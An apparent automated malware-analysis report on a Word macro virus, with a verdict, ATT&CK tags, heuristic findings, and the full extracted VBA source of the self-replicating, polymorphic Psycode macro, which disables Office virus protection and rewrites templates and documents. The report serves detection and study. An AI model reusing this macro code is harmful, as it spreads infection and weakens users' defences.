Verdict: MALICIOUS
Risk Score: 204
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro markers and VBA macros, including AutoOpen and Document_Open, indicating it is designed to execute malicious code upon opening. The macro exhibits self-replication and AV tampering behaviors, suggesting it aims to download and execute a secondary payload. The ClamAV detection of 'Doc.Trojan.Psycode-1' further supports its malicious nature.
Heuristics (7)

- ClamAV: Doc.Trojan.Psycode-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Psycode-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `dc.deletelines 1, dc.countoflines`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Private Sub autoopen(): p2: End Sub`
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Private Sub document_open(): p2: End Sub`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Private Sub autoclose(): p2: End Sub`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3618 bytes | 4fe4177e494750379ba680522d144c9b9e2030d64b6c6f6dcd1fe716cdae367f |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_close(): p2: End Sub
Private Sub autoclose(): p2: End Sub
Private Sub document_open(): p2: End Sub
Private Sub autoopen(): p2: End Sub
Private Sub p2()
Application.ShowVisualBasicEditor = 0: Options.VirusProtection = 0: Application.EnableCancelKey = 0
On Error Resume Next
Options.VirusProtection = 0: Application.EnableCancelKey = 0
With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule
newcode
z = .procstartline("autoexec", 0)
Set dc = ActiveDocument.VBProject.vbcomponents.Item(1).codemodule
dc.deletelines 1, dc.countoflines
dc.addfromstring (.lines(z, z + 13))
r = 1 + Int(Rnd * 2)
For x = 0 To 3
dc.addfromstring (.lines((x Xor r) + 1, 1))
Next x
.deletelines 1, 4
.addfromstring (dc.lines(1, 3))
.addfromstring (dc.lines(4, 1))
.replaceline .procstartline("extra", 0) + 1, "set dc=activedocument"
extra
End With
dc.replaceline dc.procstartline("autoexec", 0), "private sub p2"
'With ActiveDocument: If Left(.FullName, 2, 1) = ":" Then .SaveAs .FullName: End With
End Sub
Private Sub newcode()
With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule
a = Chr(34)
z = .procstartline("autoexec", 0)
c = (128 + Int(Rnd * 128))
For x = 0 To 3
q = Chr(97 + (x * 5) + Int(Rnd * 5))
.replaceline z + x + 1, q & "=" & a & a
u = u & " & " & q
Next x
.replaceline z + 5, "z=" & Mid(u, 4)
.replaceline z + 7, "y = y & chr(asc(mid(z, x, 1)) xor " & c & ")"
s = UCase(.lines(1, (z + 12)))
.replaceline z + 6, "for x=1 to " & Len(s)
For k = 1 To Len(s)
t = Mid(s, k, 1)
If Asc(t) < 90 And Asc(t) > 65 Then t = Chr(Asc(t) + Int(Rnd * 2) * 32)
p = p & t
Next k
For x = 1 To Len(p): b = b & Chr(Asc(Mid(p, x, 1)) Xor c): Next x
For x = 0 To 3
.replaceline z + x + 1, Mid(u, 4 * (x + 1), 1) & "=" & a & Mid(b, (1016 * x) + 1, 1016) & a
Next x
End With
End Sub
Private Sub extra()
Set dc = ActiveDocument
Set dcc = dc.VBProject.vbcomponents
For x = 2 To dcc.Count: dcc.Remove dcc.Item(2): Next x
With dcc.Item(1).codemodule
z = .procstartline("autoexec", 0)
For x = z + 5 To z + 12
crap = ""
For y = 0 To 20 + Int(Rnd * 30)
crap = crap & Chr(32 + Int(Rnd * 224))
Next y
.replaceline x, .lines(x, 1) & "'" & crap
Next x
End With
End Sub
Private Sub autoexit()
newcode
With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule
.replaceline .procstartline("extra", 0) + 1, "set dc=normaltemplate"
extra
.deletelines 1, (.procstartline("autoexec", 0) - 1)
End With
NormalTemplate.Save
End Sub
Private Sub toolsoptions()
Options.VirusProtection = 1
Dialogs(974).Show
Options.VirusProtection = 0
End Sub
Private Sub toolsmacro()
System.PrivateProfileString("", "hkey_local_machine\software\microsoft\windows\currentversion", "ProductID") = "Manche Sachen sind nicht immer wie sie aussehen"
End Sub
Sub viewvbcode()
a = "hkey_current_user\software\microsoft\windows\currentversion\explorer\runmru"
System.PrivateProfileString("", a, "a") = "w97m/psycode v2.e2 wed aug 18 99 [swl/lz0/dvc]"
System.PrivateProfileString("", a, "mrulist") = "a"
End Sub
Private Sub autoexec()
e = ""
j = ""
n = ""
r = ""
z = e & j & n & r
For x = 1 To 3365
y = y & Chr(Asc(Mid(z, x, 1)) Xor 183)
Next x
With NormalTemplate.VBProject.vbcomponents.Item(1).codemodule
.deletelines 1, .countoflines: .addfromstring y
End With
End Sub
```